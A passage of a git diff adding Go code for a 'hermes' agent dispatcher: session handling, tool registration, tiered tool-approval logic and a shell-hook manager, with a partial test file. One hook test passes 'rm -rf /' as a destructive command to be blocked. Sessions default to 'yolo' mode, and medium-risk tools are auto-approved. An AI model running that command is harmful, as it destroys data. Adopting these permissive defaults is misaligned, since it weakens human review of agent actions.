+	log.Printf("[hermes] HandleMessage: platform=%s userID=%s text=%q", msg.Platform, msg.UserID, truncate(msg.Text, 80))
+
+	// Check user whitelist
+	if err := d.security.CheckUserAllowed(msg.Platform, msg.UserID); err != nil {
+		return "", err
+	}
+
+	// Check if command
+	if strings.HasPrefix(msg.Text, "/") {
+		return d.handleCommand(msg)
+	}
+
+	sess, err := d.resolveSession(msg.Platform, msg.UserID)
+	if err != nil {
+		return "", fmt.Errorf("resolve session: %w", err)
+	}
+
+	sess.Lock()
+	defer sess.Unlock()
+	sess.Touch()
+
+	return d.runAgent(ctx, sess, msg.Text, msg.ProgressFunc)
+}
+
+// HandleWSMessage processes a message from a WebSocket client.
+func (d *Dispatcher) HandleWSMessage(ctx context.Context, connID, text string, eventCh chan<- agent.Event) error {
+	if strings.HasPrefix(text, "/") {
+		result := d.handleCommandForWS(connID, text)
+		eventCh <- agent.Event{
+			Type:          agent.EventStatus,
+			StatusMessage: result,
+		}
+		eventCh <- agent.Event{Type: agent.EventDone, Done: true}
+		return nil
+	}
+
+	sess, err := d.resolveSession("ws", connID)
+	if err != nil {
+		return fmt.Errorf("resolve session: %w", err)
+	}
+
+	sess.Lock()
+	defer sess.Unlock()
+	sess.Touch()
+
+	return d.runAgentStreaming(ctx, sess, text, eventCh)
+}
+
+// resolveSession finds or creates the active session for a platform user.
+func (d *Dispatcher) resolveSession(platform, userID string) (*HermesSession, error) {
+	key := sessionKey(platform, userID)
+
+	d.mu.RLock()
+	if sess, ok := d.sessions[key]; ok {
+		d.mu.RUnlock()
+		log.Printf("[hermes] session reused: %s", key)
+		return sess, nil
+	}
+	d.mu.RUnlock()
+
+	log.Printf("[hermes] session not found in cache, creating: %s", key)
+
+	// Create or load session
+	d.mu.Lock()
+	defer d.mu.Unlock()
+
+	// Double-check after acquiring write lock
+	if sess, ok := d.sessions[key]; ok {
+		log.Printf("[hermes] session found after write lock: %s", key)
+		return sess, nil
+	}
+
+	dir := d.hermesSessionDir(platform, userID)
+	activePath := filepath.Join(dir, "active.jsonl")
+	workDir := d.cfg.GetPlatformWorkDir(platform)
+	if err := d.security.CheckWorkDirAllowed(workDir); err != nil {
+		return nil, err
+	}
+
+	var mgr *session.Manager
+	if _, err := os.Stat(activePath); err == nil {
+		// Load existing active session
+		var openErr error
+		mgr, openErr = session.Open(activePath)
+		if openErr != nil {
+			// Corrupt session — archive it and create new
+			d.archiveCorrupt(activePath)
+			mgr = nil
+		}
+	}
+
+	if mgr == nil {
+		// Create new session
+		if err := os.MkdirAll(dir, 0700); err != nil {
+			return nil, fmt.Errorf("create session dir: %w", err)
+		}
+		mgr = session.New(workDir, dir)
+		if err := mgr.Init(); err != nil {
+			return nil, fmt.Errorf("init session: %w", err)
+		}
+		// Rename the auto-generated file to active.jsonl
+		if mgr.GetFile() != activePath {
+			if err := os.Rename(mgr.GetFile(), activePath); err != nil {
+				return nil, fmt.Errorf("rename to active.jsonl: %w", err)
+			}
+			// Re-open from the renamed path
+			var openErr error
+			mgr, openErr = session.Open(activePath)
+			if openErr != nil {
+				return nil, fmt.Errorf("open renamed session: %w", openErr)
+			}
+		}
+	}
+
+	// Build tools registry
+	sbMgr := sandbox.NewManager(workDir)
+	if d.sandbox {
+		sbMgr.SetLevel(sandbox.LevelStandard)
+	} else {
+		sbMgr.SetLevel(sandbox.LevelNone)
+	}
+	reg := tools.NewRegistry(workDir, sbMgr.GetActive())
+	reg.RegisterDefaults()
+
+	// Register memory tool
+	memStore := memory.NewStore(d.cfg.Memory.Path, workDir)
+	reg.Register(memory.NewMemoryTool(memStore))
+
+	// Register subagent tools when multi-agent mode is enabled
+	if d.agentMgr != nil {
+		reg.Register(agent.NewSubAgentSpawnTool(d.agentMgr))
+		reg.Register(agent.NewSubAgentStatusTool(d.agentMgr))
+		reg.Register(agent.NewSubAgentSendTool(d.agentMgr))
+		reg.Register(agent.NewSubAgentDestroyTool(d.agentMgr))
+	}
+
+	// Register cron tool when cron store is available
+	if d.cronStore != nil {
+		reg.Register(cron.NewCronTool(d.cronStore, d.scheduler))
+	}
+
+	// Load and connect MCP servers
+	var mcpClients []*mcp.Client
+	mcpServers, err := mcp.LoadConfiguredServers(workDir)
+	if err != nil {
+		log.Printf("[hermes] load MCP servers: %v", err)
+	} else if len(mcpServers) > 0 {
+		clients, err := mcp.ConnectServers(context.Background(), mcpServers, reg, mcp.Callbacks{})
+		if err != nil {
+			log.Printf("[hermes] connect MCP servers: %v", err)
+		} else {
+			mcpClients = clients
+			log.Printf("[hermes] connected %d MCP server(s) for %s/%s", len(clients), platform, userID)
+		}
+	}
+
+	sess := &HermesSession{
+		ID:         key,
+		Platform:   platform,
+		UserID:     userID,
+		WorkDir:    workDir,
+		Manager:    mgr,
+		Registry:   reg,
+		MCPClients: mcpClients,
+		Mode:       "yolo",
+		LastUsed:   time.Now(),
+	}
+
+	d.sessions[key] = sess
+	log.Printf("[hermes] session created: %s (workDir=%s)", key, workDir)
+	return sess, nil
+}
+
+// RotateSession archives the current session and creates a new one.
+// Called when user sends /new.
+func (d *Dispatcher) RotateSession(platform, userID string) error {
+	key := sessionKey(platform, userID)
+	log.Printf("[hermes] rotating session: %s", key)
+
+	d.mu.Lock()
+	defer d.mu.Unlock()
+
+	dir := d.hermesSessionDir(platform, userID)
+	activePath := filepath.Join(dir, "active.jsonl")
+
+	// Archive existing active session
+	if _, err := os.Stat(activePath); err == nil {
+		mgr, err := session.Open(activePath)
+		if err == nil {
+			hdr := mgr.GetHeader()
+			idPrefix := "unknown"
+			if hdr != nil && len(hdr.ID) >= 8 {
+				idPrefix = hdr.ID[:8]
+			}
+			archived := filepath.Join(dir, fmt.Sprintf("%s_%s.jsonl",
+				time.Now().Format("20060102-150405"), idPrefix))
+			os.Rename(activePath, archived)
+		} else {
+			// Can't parse — just rename with timestamp
+			archived := filepath.Join(dir, fmt.Sprintf("%s_corrupt.jsonl",
+				time.Now().Format("20060102-150405")))
+			os.Rename(activePath, archived)
+		}
+	}
+
+	// Close MCP clients and remove from cache so next message creates fresh session
+	if sess, ok := d.sessions[key]; ok {
+		if len(sess.MCPClients) > 0 {
+			mcp.CloseClients(sess.MCPClients)
+		}
+	}
+	delete(d.sessions, key)
+
+	return nil
+}
+
+// GetSession returns a session by key, or nil if not found.
+func (d *Dispatcher) GetSession(key string) *HermesSession {
+	d.mu.RLock()
+	defer d.mu.RUnlock()
+	return d.sessions[key]
+}
+
+// ListSessions returns all active session keys.
+func (d *Dispatcher) ListSessions() []*HermesSession {
+	d.mu.RLock()
+	defer d.mu.RUnlock()
+	result := make([]*HermesSession, 0, len(d.sessions))
+	for _, s := range d.sessions {
+		result = append(result, s)
+	}
+	return result
+}
+
+// RemoveSession removes a session from the pool.
+func (d *Dispatcher) RemoveSession(key string) {
+	d.mu.Lock()
+	defer d.mu.Unlock()
+	if sess, ok := d.sessions[key]; ok {
+		if len(sess.MCPClients) > 0 {
+			mcp.CloseClients(sess.MCPClients)
+		}
+		delete(d.sessions, key)
+	}
+}
+
+// runAgent executes the agent loop synchronously (for messaging platforms).
+func (d *Dispatcher) runAgent(ctx context.Context, sess *HermesSession, userInput string, progress func(string)) (string, error) {
+	workDir := sess.WorkDir
+
+	// Load context files + skills
+	extraContext := d.buildExtraContext(workDir)
+
+	// Build agent
+	agentCfg := agent.Config{
+		Provider:      d.provider,
+		Model:         d.model,
+		Mode:          sess.Mode,
+		ThinkingLevel: provider.ThinkingLevel(d.settings.DefaultThinkingLevel),
+		SandboxMgr:    sandbox.NewManager(workDir),
+		Settings:      d.settings,
+		Session:       sess.Manager,
+		ExtraContext:  extraContext,
+		CompactionSettings: ctxpkg.CompactionSettings{
+			Enabled: d.settings.Compaction.Enabled,
+		},
+		MultiAgent: d.multiAgent,
+		ApprovalHandler: func(toolCallID, toolName string, args map[string]any) bool {
+			// Smart approvals: tiered strategy (方案 D)
+			if d.security.ShouldAutoApprove(toolName, args, sess.Mode) {
+				return true
+			}
+
+			// Not auto-approved — check risk level
+			risk := "medium"
+			if toolName == "bash" {
+				if cmd, ok := args["command"]; ok {
+					risk = CommandRiskLevel(fmt.Sprintf("%v", cmd))
+				}
+			}
+
+			// Pre-tool hook check
+			if d.hooksMgr.HasPreHook() {
+				allowed, _, _ := d.hooksMgr.PreToolCall(ctx, toolName, args, sess.Platform, sess.UserID)
+				if allowed {
+					return true
+				}
+			}
+
+			// Messaging platform: medium risk → auto-approve + notify, high risk → auto-reject + notify
+			if risk == "medium" {
+				if progress != nil {
+					progress(FormatApprovalNotification(toolName, args, risk, true))
+				}
+				return true
+			}
+
+			// High risk: auto-reject on messaging platforms
+			if progress != nil {
+				progress(FormatApprovalNotification(toolName, args, risk, false))
+			}
+			return false
+		},
+	}
+
+	a := agent.NewWithLoopConfig(agent.AgentLoopConfig{
+		Config:                   agentCfg,
+		MaxIterations:            d.cfg.Agent.MaxTurns,
+		ContextPressureThreshold: d.cfg.Agent.ContextPressureThreshold,
+		BudgetPressureThreshold:  d.cfg.Agent.BudgetPressureThreshold,
+		AfterToolCall: func(ctx2 agent.AfterToolCallContext) *agent.ToolCallResult {
+			// Post-tool hook (fire-and-forget)
+			if d.hooksMgr.HasPostHook() {
+				argsMap, _ := ctx2.Args.(map[string]any)
+				errMsg := ""
+				if ctx2.IsError {
+					errMsg = ctx2.Result.Content
+				}
+				d.hooksMgr.PostToolCall(ctx, ctx2.ToolCall.Name, argsMap, ctx2.Result.Content, errMsg, sess.Platform, sess.UserID)
+			}
+			return nil
+		},
+	}, sess.Registry)
+	var runErr error
+	if d.agentMgr != nil {
+		d.agentMgr.Register(agent.NewAgentAdapter(a))
+		defer func() {
+			d.agentMgr.Finish(a.ID(), runErr)
+		}()
+	}
+
+	// Apply force compact flag from /compact command
+	if sess.ForceCompact {
+		a.SetForceCompact()
+		sess.ForceCompact = false
+	}
+
+	// Load session history so the agent has conversation context
+	if history := sess.Manager.GetMessages(); len(history) > 0 {
+		a.LoadHistoryMessages(history)
+	}
+
+	eventCh := a.Run(ctx, userInput)
+
+	var response strings.Builder
+	var thinkBuf strings.Builder
+	var eventCount int
+	var toolCount int
+	pendingToolArgs := make(map[string]map[string]any) // ToolCallID → args
+	flushThink := func() {
+		if progress != nil && thinkBuf.Len() > 0 {
+			text := thinkBuf.String()
+			if len(text) > 500 {
+				text = text[:500] + "..."
+			}
+			progress("💭 " + text)
+			thinkBuf.Reset()
+		}
+	}
+	for ev := range eventCh {
+		eventCount++
+		switch ev.Type {
+		case agent.EventThinkDelta:
+			thinkBuf.WriteString(ev.ThinkDelta)
+		case agent.EventTextDelta:
+			flushThink()
+			response.WriteString(ev.TextDelta)
+		case agent.EventToolExecutionStart:
+			if ev.ToolCallID != "" && ev.ToolArgs != nil {
+				pendingToolArgs[ev.ToolCallID] = ev.ToolArgs
+			}
+		case agent.EventToolExecutionEnd:
+			flushThink()
+			toolCount++
+			if progress != nil {
+				args := pendingToolArgs[ev.ToolCallID]
+				delete(pendingToolArgs, ev.ToolCallID)
+				line := formatToolProgress(ev, args)
+				if line != "" {
+					progress(line)
+				}
+			}
+		case agent.EventContextPressure, agent.EventBudgetPressure:
+			// Forward pressure warnings to messaging platform
+			if progress != nil && ev.PressureMessage != "" {
+				progress("\n" + ev.PressureMessage)
+			}
+			log.Printf("[hermes] %s pressure event for %s/%s: %s", ev.PressureType, sess.Platform, sess.UserID, ev.PressureMessage)
+		case agent.EventError:
+			flushThink()
+			if ev.Error != nil {
+				runErr = ev.Error
+				log.Printf("[hermes] Agent error for %s/%s: %v", sess.Platform, sess.UserID, ev.Error)
+				return "", ev.Error
+			}
+		}
+	}
+
+	result := response.String()
+	log.Printf("[hermes] Agent completed for %s/%s: events=%d, tools=%d, response_len=%d", sess.Platform, sess.UserID, eventCount, toolCount, len(result))
+
+	// If agent produced no text but executed tools, provide a fallback summary
+	if result == "" && toolCount > 0 {
+		result = fmt.Sprintf("✅ Done (%d tool calls completed)", toolCount)
+	}
+
+	return result, nil
+}
+
+// formatToolProgress formats a tool execution event into a concise one-line progress string.
+func formatToolProgress(ev agent.Event, args map[string]any) string {
+	name := ev.ToolName
+	if name == "" && ev.ToolCall != nil {
+		name = ev.ToolCall.Name
+	}
+	if name == "" {
+		return ""
+	}
+
+	var icon string
+	if ev.ToolError != nil {
+		icon = "❌"
+	} else {
+		icon = "✅"
+	}
+
+	// Build a concise summary per tool type
+	switch name {
+	case "read", "write", "edit":
+		if path, ok := args["path"].(string); ok {
+			return fmt.Sprintf("[%s]: %s %s", name, path, icon)
+		}
+	case "bash":
+		if cmd, ok := args["command"].(string); ok {
+			if len(cmd) > 60 {
+				cmd = cmd[:60] + "..."
+			}
+			return fmt.Sprintf("[bash]: %s %s", cmd, icon)
+		}
+	case "grep":
+		if pat, ok := args["pattern"].(string); ok {
+			return fmt.Sprintf("[grep]: %s %s", pat, icon)
+		}
+	case "find":
+		if pat, ok := args["pattern"].(string); ok {
+			return fmt.Sprintf("[find]: %s %s", pat, icon)
+		}
+	case "ls":
+		if path, ok := args["path"].(string); ok {
+			return fmt.Sprintf("[ls]: %s %s", path, icon)
+		}
+	}
+
+	return fmt.Sprintf("[%s] %s", name, icon)
+}
+
+// runAgentStreaming executes the agent loop and sends events to the channel (for WebSocket).
+// The eventCh is closed when the agent loop completes.
+func (d *Dispatcher) runAgentStreaming(ctx context.Context, sess *HermesSession, userInput string, eventCh chan<- agent.Event) error {
+	defer close(eventCh)
+
+	workDir := sess.WorkDir
+	extraContext := d.buildExtraContext(workDir)
+
+	agentCfg := agent.Config{
+		Provider:      d.provider,
+		Model:         d.model,
+		Mode:          sess.Mode,
+		ThinkingLevel: provider.ThinkingLevel(d.settings.DefaultThinkingLevel),
+		SandboxMgr:    sandbox.NewManager(workDir),
+		Settings:      d.settings,
+		Session:       sess.Manager,
+		ExtraContext:  extraContext,
+		CompactionSettings: ctxpkg.CompactionSettings{
+			Enabled: d.settings.Compaction.Enabled,
+		},
+		MultiAgent: d.multiAgent,
+		ApprovalHandler: func(toolCallID, toolName string, args map[string]any) bool {
+			// Smart approvals: tiered strategy (方案 D)
+			if d.security.ShouldAutoApprove(toolName, args, sess.Mode) {
+				return true
+			}
+
+			risk := "medium"
+			if toolName == "bash" {
+				if cmd, ok := args["command"]; ok {
+					risk = CommandRiskLevel(fmt.Sprintf("%v", cmd))
+				}
+			}
+
+			// Pre-tool hook check
+			if d.hooksMgr.HasPreHook() {
+				allowed, _, _ := d.hooksMgr.PreToolCall(ctx, toolName, args, sess.Platform, sess.UserID)
+				if allowed {
+					return true
+				}
+			}
+
+			// Medium risk: auto-approve + notify
+			if risk == "medium" {
+				eventCh <- agent.Event{
+					Type:          agent.EventStatus,
+					StatusMessage: FormatApprovalNotification(toolName, args, risk, true),
+				}
+				return true
+			}
+
+			// High risk on WebSocket: send approval_request, wait for response
+			approvalID := fmt.Sprintf("ap_%s_%d", toolCallID, time.Now().UnixNano())
+			respCh := d.RegisterApproval(approvalID)
+
+			eventCh <- agent.Event{
+				Type:         agent.EventToolApprovalRequest,
+				ApprovalID:   approvalID,
+				ApprovalTool: toolName,
+				ApprovalArgs: args,
+			}
+
+			// Wait for response or timeout
+			select {
+			case approved := <-respCh:
+				if approved {
+					eventCh <- agent.Event{
+						Type:          agent.EventStatus,
+						StatusMessage: fmt.Sprintf("✅ [%s] approved by user", toolName),
+					}
+				}
+				return approved
+			case <-time.After(5 * time.Minute):
+				// Timeout: auto-reject
+				d.approvalMu.Lock()
+				delete(d.pendingApprovals, approvalID)
+				d.approvalMu.Unlock()
+				eventCh <- agent.Event{
+					Type:          agent.EventStatus,
+					StatusMessage: fmt.Sprintf("⏰ [%s] approval timed out — blocked", toolName),
+				}
+				return false
+			case <-ctx.Done():
+				return false
+			}
+		},
+	}
+
+	a := agent.NewWithLoopConfig(agent.AgentLoopConfig{
+		Config:                   agentCfg,
+		MaxIterations:            d.cfg.Agent.MaxTurns,
+		ContextPressureThreshold: d.cfg.Agent.ContextPressureThreshold,
+		BudgetPressureThreshold:  d.cfg.Agent.BudgetPressureThreshold,
+		AfterToolCall: func(ctx2 agent.AfterToolCallContext) *agent.ToolCallResult {
+			if d.hooksMgr.HasPostHook() {
+				argsMap, _ := ctx2.Args.(map[string]any)
+				errMsg := ""
+				if ctx2.IsError {
+					errMsg = ctx2.Result.Content
+				}
+				d.hooksMgr.PostToolCall(ctx, ctx2.ToolCall.Name, argsMap, ctx2.Result.Content, errMsg, sess.Platform, sess.UserID)
+			}
+			return nil
+		},
+	}, sess.Registry)
+	var runErr error
+	if d.agentMgr != nil {
+		d.agentMgr.Register(agent.NewAgentAdapter(a))
+		defer func() {
+			d.agentMgr.Finish(a.ID(), runErr)
+		}()
+	}
+
+	// Apply force compact flag from /compact command
+	if sess.ForceCompact {
+		a.SetForceCompact()
+		sess.ForceCompact = false
+	}
+
+	// Load session history so the agent has conversation context
+	if history := sess.Manager.GetMessages(); len(history) > 0 {
+		a.LoadHistoryMessages(history)
+	}
+
+	agentCh := a.Run(ctx, userInput)
+
+	for ev := range agentCh {
+		if ev.Type == agent.EventError {
+			runErr = ev.Error
+		}
+		eventCh <- ev
+	}
+	return nil
+}
+
+// buildExtraContext loads context files and skills for a working directory.
+func (d *Dispatcher) buildExtraContext(workDir string) string {
+	var extra string
+	if d.settings.ContextFiles.Enabled {
+		cfResult := contextfiles.LoadContextFiles(workDir, config.ConfigDir(), d.settings.ContextFiles.ExtraFiles)
+		if ctx := contextfiles.BuildContextString(cfResult); ctx != "" {
+			extra = ctx
+		}
+	}
+
+	skillsMgr := skills.NewManager(d.settings.GetGlobalSkillsDir(), filepath.Join(workDir, ".skills"))
+	_ = skillsMgr.Load()
+	extra += skillsMgr.BuildAllSkillsContext()
+
+	return extra
+}
+
+// handleCommand processes slash commands from messaging platforms.
+func (d *Dispatcher) handleCommand(msg messaging.InboundMessage) (string, error) {
+	parts := strings.Fields(msg.Text)
+	if len(parts) == 0 {
+		return "", nil
+	}
+
+	cmd := strings.ToLower(parts[0])
+	switch cmd {
+	case "/new":
+		if err := d.RotateSession(msg.Platform, msg.UserID); err != nil {
+			return "❌ Failed to create new session: " + err.Error(), nil
+		}
+		return "✅ New session created.", nil
+	case "/clear":
+		sess, err := d.resolveSession(msg.Platform, msg.UserID)
+		if err != nil {
+			return "❌ No active session.", nil
+		}
+		sess.Lock()
+		defer sess.Unlock()
+		// Archive old session before clearing (same as /new)
+		dir := d.hermesSessionDir(msg.Platform, msg.UserID)
+		activePath := filepath.Join(dir, "active.jsonl")
+		if _, statErr := os.Stat(activePath); statErr == nil {
+			mgr, openErr := session.Open(activePath)
+			if openErr == nil {
+				hdr := mgr.GetHeader()
+				idPrefix := "unknown"
+				if hdr != nil && len(hdr.ID) >= 8 {
+					idPrefix = hdr.ID[:8]
+				}
+				archived := filepath.Join(dir, fmt.Sprintf("%s_%s.jsonl",
+					time.Now().Format("20060102-150405"), idPrefix))
+				os.Rename(activePath, archived)
+			} else {
+				archived := filepath.Join(dir, fmt.Sprintf("%s_corrupt.jsonl",
+					time.Now().Format("20060102-150405")))
+				os.Rename(activePath, archived)
+			}
+		}
+		// Close MCP clients before replacing session
+		key := sessionKey(msg.Platform, msg.UserID)
+		if len(sess.MCPClients) > 0 {
+			mcp.CloseClients(sess.MCPClients)
+		}
+		delete(d.sessions, key)
+		return "✅ Session cleared.", nil
+	case "/status":
+		sess := d.GetSession(sessionKey(msg.Platform, msg.UserID))
+		if sess == nil {
+			return "No active session.", nil
+		}
+		msgs := sess.Manager.GetMessages()
+		return fmt.Sprintf("Session: %s\nMode: %s\nMessages: %d\nWorkDir: %s",
+			sess.ID, sess.Mode, len(msgs), sess.WorkDir), nil
+	case "/sessions":
+		sessions := d.ListSessions()
+		if len(sessions) == 0 {
+			return "No active sessions.", nil
+		}
+		var sb strings.Builder
+		sb.WriteString(fmt.Sprintf("Active sessions (%d):\n", len(sessions)))
+		for _, s := range sessions {
+			msgs := s.Manager.GetMessages()
+			sb.WriteString(fmt.Sprintf("  • %s (%d msgs, %s)\n", s.ID, len(msgs), s.WorkDir))
+		}
+		return sb.String(), nil
+	case "/mode":
+		if len(parts) < 2 {
+			sess := d.GetSession(sessionKey(msg.Platform, msg.UserID))
+			if sess != nil {
+				return fmt.Sprintf("Current mode: %s", sess.Mode), nil
+			}
+			return "No active session.", nil
+		}
+		mode := strings.ToLower(parts[1])
+		switch mode {
+		case "plan", "agent", "yolo":
+			sess, err := d.resolveSession(msg.Platform, msg.UserID)
+			if err != nil {
+				return "❌ No active session.", nil
+			}
+			sess.Mode = mode
+			return fmt.Sprintf("✅ Mode set to %s.", mode), nil
+		default:
+			return "Invalid mode. Use: plan, agent, yolo", nil
+		}
+	case "/compact":
+		sess, err := d.resolveSession(msg.Platform, msg.UserID)
+		if err != nil {
+			return "❌ No active session.", nil
+		}
+		sess.Lock()
+		defer sess.Unlock()
+		if sess.Manager != nil && len(sess.Manager.GetMessages()) < 2 {
+			return "Nothing to compact: conversation is too short.", nil
+		}
+		sess.ForceCompact = true
+		return "✅ Context compaction will be triggered on the next message.", nil
+	default:
+		return fmt.Sprintf("Unknown command: %s\nAvailable: /new /clear /status /sessions /mode /compact", cmd), nil
+	}
+}
+
+// handleCommandForWS processes slash commands from WebSocket clients.
+func (d *Dispatcher) handleCommandForWS(connID, text string) string {
+	msg := messaging.InboundMessage{
+		Platform: "ws",
+		UserID:   connID,
+		Text:     text,
+	}
+	result, _ := d.handleCommand(msg)
+	return result
+}
+
+// hermesSessionDir returns the directory for a platform user's sessions.
+func (d *Dispatcher) hermesSessionDir(platform, userID string) string {
+	return filepath.Join(d.sessionDir, "hermes", safeSessionPathComponent(platform), safeSessionPathComponent(userID))
+}
+
+// sessionKey builds a session pool key.
+func sessionKey(platform, userID string) string {
+	return fmt.Sprintf("hermes/%s/%s", platform, userID)
+}
+
+func safeSessionPathComponent(s string) string {
+	if s == "" || s == "." || s == ".." {
+		return "b64_" + base64.RawURLEncoding.EncodeToString([]byte(s))
+	}
+	for _, r := range s {
+		if r >= 'a' && r <= 'z' || r >= 'A' && r <= 'Z' || r >= '0' && r <= '9' {
+			continue
+		}
+		switch r {
+		case '-', '_', '.', '@':
+			continue
+		default:
+			return "b64_" + base64.RawURLEncoding.EncodeToString([]byte(s))
+		}
+	}
+	return s
+}
+
+// archiveCorrupt renames a corrupt session file.
+func (d *Dispatcher) archiveCorrupt(path string) {
+	dir := filepath.Dir(path)
+	archived := filepath.Join(dir, fmt.Sprintf("%s_corrupt.jsonl",
+		time.Now().Format("20060102-150405")))
+	os.Rename(path, archived)
+}
+
+// RegisterApproval registers a pending approval and returns its channel.
+func (d *Dispatcher) RegisterApproval(approvalID string) chan bool {
+	ch := make(chan bool, 1)
+	d.approvalMu.Lock()
+	d.pendingApprovals[approvalID] = ch
+	d.approvalMu.Unlock()
+	return ch
+}
+
+// ResolveApproval resolves a pending approval with the given decision.
+func (d *Dispatcher) ResolveApproval(approvalID string, approved bool) bool {
+	d.approvalMu.Lock()
+	ch, ok := d.pendingApprovals[approvalID]
+	if ok {
+		delete(d.pendingApprovals, approvalID)
+	}
+	d.approvalMu.Unlock()
+
+	if ok {
+		// Use select to avoid blocking if the channel was already consumed
+		// (e.g., timeout raced with this call).
+		select {
+		case ch <- approved:
+		default:
+		}
+		return true
+	}
+	return false
+}
+
+func truncate(s string, maxLen int) string {
+	return util.TruncateWithSuffix(s, maxLen, "...")
+}
diff --git a/internal/hermes/hooks/hooks.go b/internal/hermes/hooks/hooks.go
new file mode 100644
index 0000000..bd93bce
--- /dev/null
+++ b/internal/hermes/hooks/hooks.go
@@ -0,0 +1,154 @@
+// Package hooks implements shell hook scripts for Hermes mode.
+// Hooks are external scripts called before/after tool execution,
+// communicating via JSON on stdin/stdout.
+package hooks
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"os"
+	"os/exec"
+	"strings"
+	"time"
+)
+
+// Manager manages pre/post tool call hooks.
+type Manager struct {
+	preToolCall  string // path to pre_tool_call script
+	postToolCall string // path to post_tool_call script
+	timeout      time.Duration
+}
+
+// NewManager creates a hooks manager.
+func NewManager(preToolCall, postToolCall string) *Manager {
+	return &Manager{
+		preToolCall:  preToolCall,
+		postToolCall: postToolCall,
+		timeout:      10 * time.Second,
+	}
+}
+
+// HasPreHook returns true if a pre_tool_call hook is configured.
+func (m *Manager) HasPreHook() bool {
+	return m.preToolCall != ""
+}
+
+// HasPostHook returns true if a post_tool_call hook is configured.
+func (m *Manager) HasPostHook() bool {
+	return m.postToolCall != ""
+}
+
+// PreToolCallRequest is sent to the pre_tool_call script via stdin.
+type PreToolCallRequest struct {
+	Hook     string         `json:"hook"`
+	Tool     string         `json:"tool"`
+	Args     map[string]any `json:"args"`
+	Platform string         `json:"platform"`
+	UserID   string         `json:"user_id"`
+}
+
+// PreToolCallResponse is read from the pre_tool_call script via stdout.
+type PreToolCallResponse struct {
+	Action string `json:"action"` // "allow" or "block"
+	Reason string `json:"reason,omitempty"`
+}
+
+// PostToolCallRequest is sent to the post_tool_call script via stdin.
+type PostToolCallRequest struct {
+	Hook     string         `json:"hook"`
+	Tool     string         `json:"tool"`
+	Args     map[string]any `json:"args"`
+	Result   string         `json:"result"`
+	Error    string         `json:"error,omitempty"`
+	Platform string         `json:"platform"`
+	UserID   string         `json:"user_id"`
+}
+
+// PreToolCall runs the pre_tool_call hook.
+// Returns (allow, reason, error).
+// If no hook is configured, returns (true, "", nil).
+func (m *Manager) PreToolCall(ctx context.Context, tool string, args map[string]any, platform, userID string) (bool, string, error) {
+	if m.preToolCall == "" {
+		return true, "", nil
+	}
+
+	req := PreToolCallRequest{
+		Hook:     "pre_tool_call",
+		Tool:     tool,
+		Args:     args,
+		Platform: platform,
+		UserID:   userID,
+	}
+
+	output, err := m.runScript(ctx, m.preToolCall, req)
+	if err != nil {
+		// Hook failure = allow by default (fail open)
+		return true, "", fmt.Errorf("pre_tool_call hook error: %w", err)
+	}
+
+	var resp PreToolCallResponse
+	if err := json.Unmarshal(output, &resp); err != nil {
+		return true, "", fmt.Errorf("pre_tool_call hook: invalid JSON response: %w", err)
+	}
+
+	switch strings.ToLower(resp.Action) {
+	case "block":
+		return false, resp.Reason, nil
+	case "allow", "":
+		return true, "", nil
+	default:
+		return true, "", fmt.Errorf("pre_tool_call hook: unknown action %q", resp.Action)
+	}
+}
+
+// PostToolCall runs the post_tool_call hook (fire-and-forget).
+func (m *Manager) PostToolCall(ctx context.Context, tool string, args map[string]any, result, errMsg, platform, userID string) {
+	if m.postToolCall == "" {
+		return
+	}
+
+	req := PostToolCallRequest{
+		Hook:     "post_tool_call",
+		Tool:     tool,
+		Args:     args,
+		Result:   result,
+		Error:    errMsg,
+		Platform: platform,
+		UserID:   userID,
+	}
+
+	// Fire and forget — don't block the agent loop
+	go func() {
+		m.runScript(ctx, m.postToolCall, req)
+	}()
+}
+
+// runScript executes a hook script with JSON input on stdin, returns stdout.
+func (m *Manager) runScript(ctx context.Context, scriptPath string, input any) ([]byte, error) {
+	ctx, cancel := context.WithTimeout(ctx, m.timeout)
+	defer cancel()
+
+	// Check script exists
+	if _, err := os.Stat(scriptPath); err != nil {
+		return nil, fmt.Errorf("hook script not found: %s", scriptPath)
+	}
+
+	inputJSON, err := json.Marshal(input)
+	if err != nil {
+		return nil, fmt.Errorf("marshal hook input: %w", err)
+	}
+
+	cmd := exec.CommandContext(ctx, scriptPath)
+	cmd.Stdin = strings.NewReader(string(inputJSON))
+
+	output, err := cmd.Output()
+	if err != nil {
+		if exitErr, ok := err.(*exec.ExitError); ok {
+			return nil, fmt.Errorf("hook script exited with code %d: %s", exitErr.ExitCode(), string(exitErr.Stderr))
+		}
+		return nil, err
+	}
+
+	return output, nil
+}
diff --git a/internal/hermes/hooks/hooks_test.go b/internal/hermes/hooks/hooks_test.go
new file mode 100644
index 0000000..38d7b4b
--- /dev/null
+++ b/internal/hermes/hooks/hooks_test.go
@@ -0,0 +1,136 @@
+package hooks
+
+import (
+	"context"
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+func TestNewManager(t *testing.T) {
+	m := NewManager("", "")
+	if m.HasPreHook() {
+		t.Error("expected no pre hook")
+	}
+	if m.HasPostHook() {
+		t.Error("expected no post hook")
+	}
+
+	m2 := NewManager("/path/pre", "/path/post")
+	if !m2.HasPreHook() {
+		t.Error("expected pre hook")
+	}
+	if !m2.HasPostHook() {
+		t.Error("expected post hook")
+	}
+}
+
+func TestPreToolCallNoHook(t *testing.T) {
+	m := NewManager("", "")
+	allowed, reason, err := m.PreToolCall(context.Background(), "bash", map[string]any{"command": "ls"}, "ws", "user1")
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if !allowed {
+		t.Error("expected allowed when no hook")
+	}
+	if reason != "" {
+		t.Errorf("expected empty reason, got %s", reason)
+	}
+}
+
+func TestPreToolCallAllow(t *testing.T) {
+	script := createTestScript(t, `#!/bin/sh
+echo '{"action": "allow"}'
+`)
+	defer os.Remove(script)
+
+	m := NewManager(script, "")
+	allowed, reason, err := m.PreToolCall(context.Background(), "bash", map[string]any{"command": "ls"}, "ws", "user1")
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if !allowed {
+		t.Error("expected allowed")
+	}
+	if reason != "" {
+		t.Errorf("expected empty reason, got %s", reason)
+	}
+}
+
+func TestPreToolCallBlock(t *testing.T) {
+	script := createTestScript(t, `#!/bin/sh
+echo '{"action": "block", "reason": "destructive command"}'
+`)
+	defer os.Remove(script)
+
+	m := NewManager(script, "")
+	allowed, reason, err := m.PreToolCall(context.Background(), "bash", map[string]any{"command": "rm -rf /"}, "ws", "user1")
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
